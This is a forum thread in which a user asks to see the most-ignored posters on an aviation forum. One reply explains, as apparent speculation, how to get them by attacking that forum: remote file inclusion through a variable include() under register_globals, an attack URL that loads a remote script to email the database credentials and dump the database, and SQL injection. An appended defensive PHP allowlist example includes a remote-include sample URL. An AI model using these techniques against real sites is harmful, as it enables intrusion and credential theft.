I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.
Can you do that, and if so, would you? Seems it would be fun.
I think you'd have to do that on your own. Find an include() function in one of the weak extensions to this forum. Flash Chat or some other thing Chuck added would be a good start. If you could find an include that uses a variable for example:
Code:
$script = 'fancyscript.php';
include($script);
That is the EASIEST thing to look for in PHP (ideally you'll need the source to do this, buy it). If you see something like that you can almost *COUNT* on most web servers being set up crappy with register_globals on. If that's the case you can just pass a new script via the URL.
Once you find this you just set up a file on your web server.
call it.. executepoa.php
You could put anything you want in there that would execute on the POA server. It would be *very* simple to write a script that would e-mail the configuration file for vBulletin that holds the database username/password.
Now you just trick the POH script into executing it by doing something like this:
Code:
http://www.pilotsofamerica.com/flashchat.php?script=http://www.nickswebsite.com/executepoa.php
Now you just reassigned that script variable (like I said, I bet register globals is on, which is what makes this possible) to inject your own code into the POA code.
Once you get the database username and password it would be simple to modify your code injection to dump the database into a compressed file to e-mail to yourself.
Or you could always just go with the classic SQL injection which is also pretty easy most of the time. More or less you just need some type of form input box. If you can get that with some patience (really helps to have the source code to look at) you can write an SQL query inside that box. That box is usually a variable which is dropped into a database query. If you format it right you can add another query inside that query and have it format the output to display it on the following page. Figure out the formatting right and with a little luck the programmers probably didn't properly verify data input and you've got your answer to your most ignored question.
Of course--I'm sure none of this could happen since all the extensions are probably rock solid and I highly doubt a responsible system admin like Chuck would have register_globals enabled (although many PHP scripts depend on it being on).
I guess it just depends how bad you want to know....I'd rather do something more fun like photoshop pictures of Tony.
Void where prohibited. Educational use only. Pure speculation. Do any of this and CowboyPilot and Chuck will kick your ass.. Blah Blah Legal crap.
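
The fix for the variable-driven include() described in the post above, as an added example that is not part of the original thread: the request value is used only as a lookup key into a fixed allowlist, so a URL or a path in the parameter is rejected before include is ever reached. The names ALLOWED_SCRIPTS, resolve_script, help.php and the includes directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request key => file shipped with the application.
// Only the values on the right can ever reach include.
const ALLOWED_SCRIPTS = [
    'fancy' => 'fancyscript.php',
    'help'  => 'help.php',
];

/**
 * Map a request-supplied key to a fixed local path, or null if not allowed.
 * The caller's value is used only as an array key, never as part of a path,
 * so URLs, "../" sequences and non-string input all fall through to null.
 */
function resolve_script($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_SCRIPTS)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . ALLOWED_SCRIPTS[$requested];
}

// Constructed sample inputs (not taken from any real request log).
$samples = [
    'fancy',                                // legitimate key
    'http://attacker.example/payload.php',  // remote include attempt
    '../../config.php',                     // local path traversal attempt
    ['fancy'],                              // array smuggled via ?script[]=
    null,                                   // parameter missing
];

foreach ($samples as $input) {
    $path = resolve_script($input, __DIR__ . '/includes');
    printf("%-42s => %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        $path ?? 'REJECTED');
}

// In a request handler the same function gates the include:
//   $path = resolve_script($_GET['script'] ?? null, __DIR__ . '/includes');
//   if ($path === null) { http_response_code(400); exit; }
//   include $path;
```

On the server side, register_globals was removed in PHP 5.4 and allow_url_include is Off by default, which closes the remote-URL case but not local path traversal in code that still includes a request variable directly.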